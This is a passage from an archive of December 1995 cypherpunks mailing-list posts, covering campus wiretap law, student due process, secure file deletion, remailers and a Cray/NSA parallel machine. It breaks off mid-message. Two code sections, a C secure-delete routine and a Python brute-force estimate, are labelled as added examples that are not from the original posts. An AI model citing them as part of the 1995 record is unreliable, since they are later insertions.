From: Harvey A Silverglate <has@world.std.com>
Subject: Re: Is ths legal?...
To: "Declan B. McCullagh" <declan+@CMU.EDU>
In-Reply-To: <wkoy1Sq00YUvMl2sVN@andrew.cmu.edu>
Message-Id: <Pine.3.89.9512171444.F10678-0100000@world.std.com>
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII

Declan -
   The answer to the "is this legal?" question is more complex than 
simply "private versus public" university.  There are fairly strict 
federal anti-wiretapping laws.  It is hardly clear that a private 
university may eavesdrop on students' phone or computer conversations, 
even if conducted over the university's network.  Furthermore, many 
states have their own anti-wiretap and anti-eavesdrop laws, which are 
even stricter than federal standards.  I don't have the time nor the 
inclination to do research into Oklahoma law, but we did some research 
into this area of state and federal law for the LaMacchia case and 
concluded that in its investigation of David LaMacchia, MIT very well 
might have violated federal laws.
       Harvey Silverglate






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 17 Dec 1995 20:36:03 +0800
To: cypherpunks@toad.com
Subject: Re: kocher's timing attack
In-Reply-To: <199512150203.VAA00869@opine.cs.umass.edu>
Message-ID: <199512170409.PAA22283@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello cypherpunks@toad.com (Cypherpunks Mailing List)
  and futplex@pseudonym.com (Futplex)

Futplex writes:
... [in reply to others] ...
> You are overlooking the main point that this is a _timing_ attack. Unless
...
> Just beware of
> people with extremely precise stopwatches at key signing parties ;>

Hold on, you *never* sign directly at key signing parties!

Never take your key where:
  - it could be stolen
  - you suspect others may wish to influence your signing
  - somebody might spy your passphrase (hidden cameras in ceiling)

You take fingerprints, and sign when you get back home.


Re the timing subject, do you think it'd make a good party trick?

  * Think of a number between 20 and 30.
  * for 4-5 numbers a, "Multiply the orignal number by <a>"
  * the number you are thinking of is <number>

Now, anybody have statistics for mental arithmetic?

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMNOXuyxV6mvvBgf5AQFEtgP/Wf5I205BAuqiuSEwkslbGP0nwV8ylA0G
nnmS1FFJjFkkfICxEp+/C0iQqLcYpp1ytio+yyWmAE+nDEomcmnQb40ElGjYB/2m
btP6cT9ozfM8lXY6Tfn+G+kduZWfpKyngoMDSPzYSNAuizD5qyUodYJXyjfz4y0p
BoXBMwB9IUA=
=EpU4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Russ Cooper <rcooper@the-wire.com>
Date: Mon, 18 Dec 1995 04:41:53 +0800
To: "'jim bell'" <jimbell@pacifier.com>
Subject: RE: Political Cleanup program
Message-ID: <01BACC91.AB611320@rcooper.the-wire.com>
MIME-Version: 1.0
Content-Type: text/plain


A much simpler solution might be to just force all politicians to give up 
their campaign funds when they retire, or even better, immediately 
following the elections. Today, whatever is left in their campaign funds 
is given over to them when they retire or are forced out of office, on top 
of their lucrative pensions.

Cheers,
Russ





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Date: Mon, 18 Dec 1995 08:22:34 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Is ths legal?...
In-Reply-To: <Pine.SUN.3.91.951217055442.19904B-100000@polaris.mindport.net>
Message-ID: <Pine.ULT.3.91.951217151620.973A-100000@krypton.mankato.msus.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 17 Dec 1995, Black Unicorn wrote:

> I this ruling would prevent the Supreme Court from defining 
> something as a privledge or right.
> 
> It would also pose this limitation on states, as they are public 
> entities, and thus driver's licenses cannot be defined as one or the 
> other, which as we all very well know, they are.

I am appending the file from the EFF that talks about the privledge/right 
distinction.  There is a URL as part of the file.

==========
=============== ftp://ftp.eff.org/pub/CAF/faq/just-a-privilege ===============
q: If a state university calls computer or network access a
"privilege", can they remove an individual's access arbitrarily?

a: In most cases no. U.S. courts no longer recognize the wooden
distinction between privileges and rights [Board of Regents v.  Roth,
408 U.S. 564 (1972)].

One need only look at the Constitution to see that "privilege" is
often used to mean something different than its informal use. The 14th
Amendment says "No State shall make or enforce any law which shall
abridge the privileges or immunities of citizens of the United
States;". The Constitution also refers to the "privilege of the writ
of habeas corpus", "privileges and immunities of citizens in the
several States", and "privileged from arrest during their attendance
at the session of their respective houses".

In _Goss v. Lopez_, the Supreme Court said a "student's legitimate
entitlement to a public education is a property interest which is
protected by the Due Process Clause and .. may not be taken away for
misconduct without adherence to the minimum procedures required by
that Clause." The Court went on to say that "the Due Process Clause
also forbids arbitrary deprivations of liberty. 'Where a person's good
name, reputation, honor or integrity is at stake because of what the
government is doing to him,' the minimal requirements of the Clause
must be satisfied."

So what are a university student's property rights?  "The Fourteenth
Amendment requires due process before a governmental entity, such as a
public institution, may deprive one of life, liberty, or property. In
a college setting, a student's good name and reputation are considered
a 'liberty' right, and a student's right to attend college is
considered a 'property' right. Due process would be required before a
student is deprived of either at a public institution." [_A Practical
Guide to Legal Issues Affecting College Teachers_ by Partrica A.
Hollander, D. Parker Young, and Donald D. Gehring.  (College
Administration Publication, 1985).]

So is a student's computer access a property right? I'd say it
depends. On one extreme, I'm confident a student has a property right
in account financed via the student computer or engineering fee. On
the other extreme, if a professor informally gave a student an account
on that professor's personal workstation, the professor could probably
remove that access without due process.

So what about department accounts? In the departments I know of,
accounts are given to any students who meet some set of requirements.
I think this makes them an entitlement for the students who qualify
and hence some modicum of due process is necessary.

ANNOTATED REFERENCES

(All these documents are available on-line. Access information follows.)

=================<a href="http://www.eff.org/CAF/faq/due-process.html">
faq/due-process
=================</a>
* Due Process
 
q: Should users be suspended from the computer pending formal discipline?
 
a: No, with one exception. Just as students should not be expelled
...

=================<a href="ftp://ftp.eff.org/pub/CAF/academic/student.freedoms.a
aup">
academic/student.freedoms.aaup
=================</a>
* Student Freedoms (AAUP)

Joint Statement on Rights and Freedoms of Students -- This is the main
U.S. statement on student academic freedom.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/goss-v-lopez.mnookin">
law/goss-v-lopez.mnookin
=================</a>
* Due Process -- When Required -- Goss v. Lopez -- Mnookin

Comments from _In the Interest of Children_, R. Mnookin (Ed.),
Franklin E.  Zimring and Rayman L.  Solomon (Contrib. Authors). It
reports that the Supreme Court says that some modicum of due process
is necessary unless the matter is trivial or there is an emergency.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/goss-v-lopez.fischer">
law/goss-v-lopez.fischer
=================</a>
* Due Process -- When Required -- Goss v. Lopez -- Fischer

Comments from _Teacher's and the Law_, 3rd edition, by Louis Fischer,
et al. Published in 1991 by Longman. It reports that the Supreme Court
says that some modicum of due process is necessary unless the matter
is trivial or there is an emergency.

=================<a href="ftp://ftp.eff.org/pub/CAF/law/constraints.constitutio
nal">
law/constraints.constitutional
=================</a>
* Constitution -- Public University -- Constraints

Comments from _A Practical Guide to Legal Issues Affecting College
Teachers_ by Partrica A. Hollander, D. Parker Young, and Donald D.
Gehring.  (College Administration Publication, 1985).  Discusses the
constitutional constraints on public universities including the
requires for freedom of expression, freedom against unreasonable
searches and seizures, due process, specific rules.

=================
=================

If you have gopher, you can browse the CAF archive with the command
   gopher gopher.eff.org

These document(s) are also available by anonymous ftp (the preferred
method) and by email. To get the file(s) via ftp, do an anonymous ftp
to ftp.eff.org, and then:

  cd  /pub/CAF/faq
  get due-process
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/law
  get goss-v-lopez.mnookin
  cd  /pub/CAF/law
  get goss-v-lopez.fischer
  cd  /pub/CAF/law
  get constraints.constitutional

To get the file(s) by email, send email to ftpmail@decwrl.dec.com
Include the line(s):

  connect ftp.eff.org
  cd  /pub/CAF/faq
  get due-process
  cd  /pub/CAF/academic
  get student.freedoms.aaup
  cd  /pub/CAF/law
  get goss-v-lopez.mnookin
  cd  /pub/CAF/law
  get goss-v-lopez.fischer
  cd  /pub/CAF/law
  get constraints.constitutional



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: PGP Signed with PineSign 2.2

iQCVAwUBMNRs8zokqlyVGmCFAQGgRwP/e2fqRuiVrDWGWuYAnq1IQhUlhULSPlGY
f8/2+N2/VqblVFsXyOBDA6YgwzTiFgiljOVFo2Bxw3RYyBDxWxr6yDS7BxGf7Zdp
QjhIPP7fAk6wNKu3ACwtq3iap9BsOGcZlF2fGrP3B0jsDQtFxosGMNUiPH8HPs5Z
l1QTiAyZ8yw=
=F7PT
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GED/J d-- s:++>: a-- C++(++++)$ ULUO++ P+>+++ L++ !E---- W+(---) N+++ o+
K+++ w+(---) O- M+$>++ V-- PS++(+++)>$ PE++(+)>$ Y++ PGP++ t- 5+++ X++
R+++>$ tv+ b+ DI+++ D+++ G+++++>$ e++$>++++ h r-- y+**
------END GEEK CODE BLOCK------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 17 Dec 1995 12:58:04 +0800
To: jps@monad.semcor.com (Jack P. Starrantino)
Subject: Re: Secured RM ? (source)
In-Reply-To: <9512151425.AA07871@monad.semcor.com>
Message-ID: <199512170428.PAA22362@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello jps@monad.semcor.com (Jack P. Starrantino)
  and cypherpunks@toad.com

...
> I think you can work this way if you open the file for read/write
> access, although I'd be more inclined to take the file name into the
> directory and then walk the inodes.

Yuck!

Opening the file for read/write should be ok on all filesystems
where walking the inodes is doable and ok, and will be more portable.

Walking the inodes has the advantage that it won't run out of disk space,
but I suspect confidential files with holes will be rare.

There's no automatic rm that will also delete all backups of the file.
(You are keeping backups, aren't you?)


Hope I'm making sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMNOcVixV6mvvBgf5AQGrkwQAnyNO9i+U470nlTcjJbu6lTQUNw+8b24L
2rZC/niE0WV9xFXYEQHA8cmFJrpLqp8OcfxZVLU+aYJ6sD2z3ehM5nlT7yoSTxXk
/GSp1DgW8rfu19Ovf7xAe6CBt7/NNo/WNsd6pTev648Dj3tdNBCkqf8IlSu/22qa
FgvShjjz8+Q=
=6ZDm
-----END PGP SIGNATURE-----
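
The "open the file for read/write" approach from the message above, written out in C as an added example; it is not code from the original message or from any existing rm replacement. The names hole_bytes, overwrite_fd and secure_rm are hypothetical, and st_blocks is assumed to count 512-byte units.

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Bytes of the file's logical size with no blocks allocated behind them.
 * Assumption: st_blocks is in 512-byte units. Overwriting through the file
 * interface must allocate these, which is where the "running out of disk
 * space" concern for files with holes comes from. */
static off_t hole_bytes(const struct stat *st)
{
    off_t allocated = (off_t)st->st_blocks * 512;
    return st->st_size > allocated ? st->st_size - allocated : 0;
}

/* Overwrite every byte of an open regular file with `fill` and flush it.
 * Returns the number of bytes written, or -1 on error (including ENOSPC
 * while filling holes). */
static off_t overwrite_fd(int fd, unsigned char fill)
{
    struct stat st;
    unsigned char buf[4096];
    off_t done = 0;

    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode))
        return -1;
    if (lseek(fd, 0, SEEK_SET) != 0)
        return -1;
    memset(buf, fill, sizeof buf);
    while (done < st.st_size) {
        size_t want = sizeof buf;
        ssize_t n;
        if ((off_t)want > st.st_size - done)
            want = (size_t)(st.st_size - done);
        n = write(fd, buf, want);
        if (n <= 0)
            return -1;
        done += n;
    }
    if (fsync(fd) != 0)          /* push the overwrite out of the page cache */
        return -1;
    return done;
}

/* Open read/write without O_TRUNC (truncating would free the old blocks
 * with their contents intact), overwrite in place, then unlink.
 * On any error the file is left where it is so the caller can retry.
 * Returns 0 on success, -1 on error; *holes_filled (optional) receives the
 * number of hole bytes that had to be allocated. */
int secure_rm(const char *path, off_t *holes_filled)
{
    struct stat st;
    off_t written;
    int fd = open(path, O_RDWR);

    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0) {
        close(fd);
        return -1;
    }
    if (holes_filled)
        *holes_filled = hole_bytes(&st);
    written = overwrite_fd(fd, 0x00);
    if (written != st.st_size) {
        close(fd);
        return -1;
    }
    if (close(fd) != 0)
        return -1;
    return unlink(path);
}

int main(int argc, char **argv)
{
    off_t holes = 0;

    if (argc != 2) {
        fprintf(stderr, "usage: %s FILE\n", argv[0]);
        return 2;
    }
    if (secure_rm(argv[1], &holes) != 0) {
        perror(argv[1]);
        return 1;
    }
    if (holes > 0)
        fprintf(stderr, "note: %lld bytes of holes were allocated\n",
                (long long)holes);
    return 0;
}
```

As the message says, nothing here touches backups; the same holds for any other copy the overwrite cannot reach through this file descriptor, such as blocks kept by a copy-on-write or log-structured file system.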




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 18 Dec 1995 10:07:09 +0800
To: cypherpunks@toad.com
Subject: Re: PAY-OFF TIME FOR BUG-BUSTERS, NETSCAPE PLEDGES "DOGFIGHT"
Message-ID: <199512172339.PAA05833@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 15 Dec 1995 anonymous-remailer@shell.portal.com wrote:

> On Fri, 15 Dec 1995, Alice de 'nonymous wrote:
> 
> > Can anyone tell me whether Ian Goldberg and David Wagner got their $25,000
> > from Netscape for finding the HUGE security flaws in Netscape's existing 
> > product line??
> >
> > Alice de 'nonymous ...               <an455120@anon.penet.fi>
>                                        ^^^^^^^^^^^^^^^^^^^^^^^^
> 
> Heh, hey Alice, you know this discussion a short time ago where you
> claimed that you wouldn't use PGP for signing because it wasn't secure
> or something, what's with the use of the penet address?

Uhhm, actually, I said that I don't have a secure machine to run PGP
on, and that I didn't feel that I should have to travel across town to use
a secure machine to ask whether or not Ian Goldberg and or David Wagner
got any moola from Netscape or AT&T for helping to make these
companies a fortune.

Did they get their $25,000, or a scholarship, or a Christmas week or 
two at the Halekulani in Honolulu??

They helped out these companies, and here it is, less than ten days to 
Christmas, and what have these companies done??  

Nothing ... nothing at all ... but freeload ...

> Surely a penet address offers even less protection for your id?
> 
> Or have you done something nifty like create the penet address with a
> nymserver address?

Yep, something like that ... you must be paying attention, my friendly
"spoofing" shadow.  The Penet address is simply to prevent huge email from
being mailed to me.  I don't want AT&T or Netscape to mailbomb me for
simply writing the truth about them.

Penet gives me some protection.

I'm not looking to Penet to protect my "identity".  All I want Penet to 
do is provide a way for people to write to me if they want to.



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 18 Dec 1995 06:00:59 +0800
To: Jay Holovacs <holovacs@styx.ios.com>
Subject: Re: Is ths legal?.. (fwd)
In-Reply-To: <Pine.3.89.9512171010.A7388-0100000@styx.ios.com>
Message-ID: <Pine.SUN.3.91.951217155251.2240A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, Jay Holovacs wrote:

> 
> On Sun, 17 Dec 1995, Black Unicorn wrote:
> > 
> > I disagree.  Instead it implies that interception and administrative 
> > review of content will be tolerated where it is "a necessary incident to 
> > the rendition of his service or to the protection of the rights or 
> > property of the provider of that service."  Note that it will be the 
> > provider who makes the definition in the ex ante application.
> > 

> The provider is allowed access ONLY for QC purposes.

This is only explicit with regards to public providers.

> Getting back to the 
> original point, the provider's ability to interpret the contents of the 
> message is in no way required to monitor the system and cannot be used as 
> a justification in itself for prohibiting use of crypto. 

Oh?  What if I say that I need to monitor e-mail for data corruption?
Also, you might consider the definition of "intercept."  I suspect it's a 
bit wider than you are accounting for.


> Also, what if someone outside the system emails encrypted messages to the 
> user. What authority would the sys admin have there??

Entirely unrelated to the statute you cite.

> Jay Holovacs <holovacs@ios.com>
> PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 
>  (KEY id 1024/80E4AA05) email for key
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 18 Dec 1995 06:20:24 +0800
To: Russ Cooper <rcooper@the-wire.com>
Subject: RE: Political Cleanup program
In-Reply-To: <01BACC91.AB611320@rcooper.the-wire.com>
Message-ID: <Pine.SUN.3.91.951217155607.2240B-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 17 Dec 1995, Russ Cooper wrote:

> A much simpler solution might be to just force all politicians to give up 
> their campaign funds when they retire, or even better, immediately 
> following the elections. Today, whatever is left in their campaign funds 
> are given over to them when they retire or are forced out of office, on top 
> of their lucrative pensions.

UH....?

> 
> Cheers,
> Russ
> 
> 

---
My preferred and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Declan B. McCullagh" <declan+@CMU.EDU>
Date: Mon, 18 Dec 1995 09:45:21 +0800
To: cypherpunks@toad.com
Subject: Re: Is ths legal?...
In-Reply-To: <2.2b7.32.19951217205443.008a13f0@mail.teleport.com>
Message-ID: <ckp8qg_00bkNQ1VJVI@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from internet.cypherpunks: 17-Dec-95 Re: Is ths legal?... by
Alan Olsen@teleport.com 
> In looking at their homepage, it appears to be a state funded school.
> (There is not a lot of background on the school history or affiliations on
> their homepage except for a note that it was founded by the territorial
> legislature a number of years before becoming a state..)

My understanding is that it is a state school. But for state action to
be present, there has to be a significant interdependent relationship
constituting a nexus of state action between the state and the
university. Like administrators being appointed by agents of the state
government.

State funding by itself is not sufficient. If that were true, CMU --
which receives almost half its revenue from the government -- would have
to behave reasonably. (It doesn't; check out
http://joc.mit.edu/~joc/cmu.html)

-Declan
(not a lawyer)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Mon, 18 Dec 1995 17:03:03 +0800
To: cypherpunks@toad.com
Subject: Re: What ever happened to... Cray Comp/NSA co-development
Message-ID: <199512180038.QAA01725@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



"Anitro" speculated about the fate and capabilities of the
CCC PIM (processor-in-memory) machine.  A friend of mine was
working on it, and it would have been a screaming machine, no
doubt about it.  He said that the Cray mostly acted like a
really fast network for the processor chips.  As "Anitro"
said, the PIM chips were made by a dedicated NSA company,
Supercomputer Research Center, in Bowie MD.

But, it was nowhere near finished when the company finally went
down, and the team was completely disbanded.  My friend was talking
about going to the auction when the parts of the various machines
were going to be sold, I don't know if he did so.  He suspected that
the various pieces would end up going back east to the Fort
Meade area.  Still, it is such an odd machine that you would
probably have to transfer the staff to finish it, and that didn't
happen.

In any case, while it was fast (1/2 million 1-bit processors,
perhaps as low as 1 nanosecond (1 GHz) cycle time), it was not fast
enough to brute force reasonably strong ciphers.  It's really no joke
that it would take a computer with picosecond clocks the size of the earth
more than the age of the universe to brute force IDEA, for instance.
It would have made a great DES cracker, though; my back-of-the-envelope
calculation has it cracking one key every .75 days on the average.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-2244
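
The estimate in the message above can be checked by working backwards from its own figures. This is an added example, not part of the original post; the age-of-the-universe constant and all function names are assumptions introduced here.

```python
import math

SECONDS_PER_DAY = 86_400
SECONDS_PER_YEAR = 365.25 * SECONDS_PER_DAY
AGE_OF_UNIVERSE_YEARS = 1.38e10   # assumption, not a figure from the message

# Figures quoted in the message.
PROCESSORS = 500_000      # "1/2 million 1-bit processors"
CLOCK_HZ = 1e9            # "1 nanosecond (1 GHz) cycle time"
DES_AVG_DAYS = 0.75       # "one key every .75 days on the average"


def expected_trials(key_bits):
    """Exhaustive search finds the key after half the keyspace on average."""
    return 2 ** (key_bits - 1)


def implied_keys_per_second(key_bits=56, avg_days=DES_AVG_DAYS):
    """Aggregate trial rate the whole machine needs to meet the quoted average."""
    return expected_trials(key_bits) / (avg_days * SECONDS_PER_DAY)


def implied_cycles_per_trial(processors=PROCESSORS, clock_hz=CLOCK_HZ):
    """Clock cycles each 1-bit processor may spend on one DES trial."""
    per_processor_rate = implied_keys_per_second() / processors
    return clock_hz / per_processor_rate


def expected_years(key_bits, keys_per_second):
    """Average search time in years for a cipher with key_bits of key."""
    return expected_trials(key_bits) / keys_per_second / SECONDS_PER_YEAR


def key_bits_bought(speedup):
    """How many extra key bits a given hardware speedup pays for."""
    return math.log2(speedup)


def summary():
    rate = implied_keys_per_second()
    idea_years = expected_years(128, rate)
    return {
        "machine keys/s implied by the DES figure": rate,
        "cycles per DES trial per processor": implied_cycles_per_trial(),
        "IDEA (128-bit) average search, years": idea_years,
        "same, in ages of the universe": idea_years / AGE_OF_UNIVERSE_YEARS,
        "key bits bought by a 10^6 speedup": key_bits_bought(1e6),
    }


if __name__ == "__main__":
    for label, value in summary().items():
        print(f"{label:45s} {value:.3g}")
```

The DES figure implies roughly 900 clock cycles per trial on each bit-serial processor, and the same machine made a million times faster still needs hundreds of universe lifetimes on a 128-bit key.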




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@kampai.euronet.nl>
Date: Mon, 18 Dec 1995 10:29:29 +0800
To: cypherpunks@toad.com
Subject: Re: BosniaLINK
Message-ID: <199512172151.QAA12926@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


[ Irrelevant crap deleted ]

Don't post irrelevant stuff here.

I've noticed an awful lot of crap posted from the replay remailer
to this group over the last few months.  Wish I could figure
out who this jerk is.

Gary
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMNSQ+CoZzwIn1bdtAQHrHQF8DyOXYfMYV5czKkMXDqJtMYWaReg1IYiX
QSG801r5LE3hMDa7ooSrQH6LwgDwPAYs
=r8dB
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Mon, 18 Dec 1995 10:28:00 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Screening of Unauthorized Access
Message-ID: <v01530502acfa5292262e@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain



Saw this in the net. I know nothing about the movie personally. Perhaps
someone on the list can comment?

>Unauthorized Access, the documentary on the computer hacker underground from
>an insider's point of view is screening in San Francisco!!!
>
>What the critics say:
>
>"Unauthorized Access lets you see and hear from those people that big
>corporations and the government are so afraid of..." - The Seattle Stranger
>
>"If you want to know what a hacker really is, this is a must" - EXE Magazine
>
>"To see the hacking world from the Inside, try watching Unauthorized Access...
>it shows hackers as they see themselves without the media's usual hype..." -
>The New Scientist
>
>"As a cultural piece, it's what we've been waiting for.  Many of us have long
>suspected that modern-day hackers have a unique and rich culture.
>Unauthorized Access is something we can point to to prove it." - 2600 - The
>Hacker Quarterly
>
>"Annaliza Savage has made a fascinating documentary about the sick world of
>criminal hacking..."  Mich Kabay - NCSA
>
>"It's a kafka-esque expose of the computer underground, a must see for all
>security experts.  This made me want to go out and become a cop."  - Cult of
>the Dead Cow
>
>Question and Answer session after the screening....
>
>Unauthorized Access is screening at:
>Artists Television Access in San Francisco
>Thursday, December 21, 1995 - 8:30 pm
>922 Valencia Street (at 21st) SF, CA  94110
>(415) 824 3890
>
>For more info on Unauthorized Access http://bianca.com/bump/ua/

-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: prf@teleport.com (Paul Farago)
Date: Mon, 18 Dec 1995 09:56:03 +0800
To: cypherpunks@toad.com
Subject: 2 websites
Message-ID: <v01510114acfa6bca2bce@[206.163.120.172]>
MIME-Version: 1.0
Content-Type: text/plain


Interested in Term Limits?  See http://www.termlimits.org

Grass Roots Research's "Portrait of America" at http://www.grr.com

Paul R. Farago, Portland OR






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert" <RDHeffren@gnn.com>
Date: Mon, 18 Dec 1995 10:45:02 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Is ths legal?.. (fwd)
Message-ID: <199512172313.SAA25145@mail-e1b.gnn.com>
MIME-Version: 1.0
Content-Type: text/plain


Sun, 17 Dec 1995 10:18:50 -0500 (EST) 
Black Unicorn <unicorn@schloss.li> writes:

> > On Sun, 17 Dec 1995, Jay Holovacs wrote:
> > Electronic Communications Privacy Act of 1986 (ECPA) (18 U.S.C. ss 2510
> > et seq.).  "It shall not be unlawful under this chapter for an
> > operator of a switchboard, or an officer, employee, or agent of a
> > provider of wire *or electronic* communication service, whose
> > facilities are used in the transmission of a wire communication,

> I disagree. Instead it implies that interception and administrative
> review of content will be tolerated where it is "a necessary
> incident to the rendition of his service or to the protection of the
> rights or property of the provider of that service."  Note that it
> will be the provider who makes the definition in the ex ante application.
> Even worse, the protection that is given is for "a provider of wire
> communication service to the public."

I also disagree because I would interpret it as "It shall not be 
unlawful...to intercept, disclose or use that communication...except 
by utilizing *service observing* or *random monitoring*." That indicates 
to me that specific monitoring is fine, but random monitoring must be 
used for quality control. And how do you become specific without being 
random? QC could be whatever the providers deem it to be, the public 
be damned.

"..anything not specifically allowed is expressly forbidden..."

RDHeffren@gnn.com
RobertH677@aol.com
id=0x95AA98CD 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 18 Dec 1995 10:07:16 +0800
To: cypherpunks@toad.com
Subject: What ever happened to... Cray Comp/NSA co-development
Message-ID: <199512172232.RAA13063@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

O.K. I'm new... however...

I remember reading an article about this news release in mid '94
(I believe it was the NY Times), about the time that Cray
Computer Company (Seymour's unsuccessful spinoff company) was
actively seeking bank financing. Anyone remember?

The article was about an NSA contract award to Cray Computer. In
some background:

The Supercomputer industry had been struggling for a while with
reductions in purchases from the U.S. government due to cutbacks
on research spending and the 'end of the cold war'. The situation 
at MasPar had gotten to the point of court reorganization or
worse. In June (of '94) Cray was in such a cash squeeze that it
took out a $17.5 million secured loan to fend off collapse. During
July, Cray announced that it was seeking a "partner" to make an
investment in exchange for technology access. Guess who shows up
with plans to build "the ultimate spying machine"? Now, Seymour's 
a nice guy, but money is tight, so he buys in on the hopes for
a more lucrative future relationship. The plot thickens.

The contract calls for Cray to put up $4.6 million to cover the
initial development (didn't they just take out a loan?) of which
about $400,000 will go to the NSA for so called "software
consulting services". It makes one wonder what the "real"
contract was worth (such as producing this surveillance system
in quantity)? There was some speculation in the article about
what this system could be used for, such as DEA operations
outside U.S. borders (Colombia perhaps) or foreign military
communication or enhancement processing of spy satellite photos.

What caught my attention was the architecture.

A "hybrid design linking two supercomputer processors with an
array of HALF A MILLION inexpensive processors" that were
designed by the U.S. government laboratory affiliated with the
NSA. The same chip house that brought us Clipper.

I've not kept up with the "ultimate" demise that eventually
befell Cray Computer Company, but the October 16 FBI filing
on capacity for Digital Telephony got me thinking back to this
article. 1% seems like a rather huge need for horsepower. And
what if GAK doesn't fly? And the widespread use of hard crypto
just keeps increasing?

This kind of machine could, in theory:

1) Implement ALL Clipper(II) based Key Escrow functionality in
   silicon (the easy part) AND allow for simultaneous decrypt and
   surveil of 'who knows how many' Clipper based data streams.

2) Implement general RSA based Prime Factoring functionality in
   silicon (the not so easy part) AND allow massively parallel
   decrypt and surveil of 'who knows how many' RSA/etc. based
   data streams.

3) Implement it all, AND 'on-line' transaction based surveillance
   via the FBI's 1% capacity infrastructure.

Chilling... Who needs key escrow (or RSA private keys) when
you've got a massively parallel prime factoring machine. What if
GAK was to become a 'non-issue'? How fast do you think a machine
such as this could factor RSA 129?

Makes you wonder if 2048 bits will be enough (my guess.. it
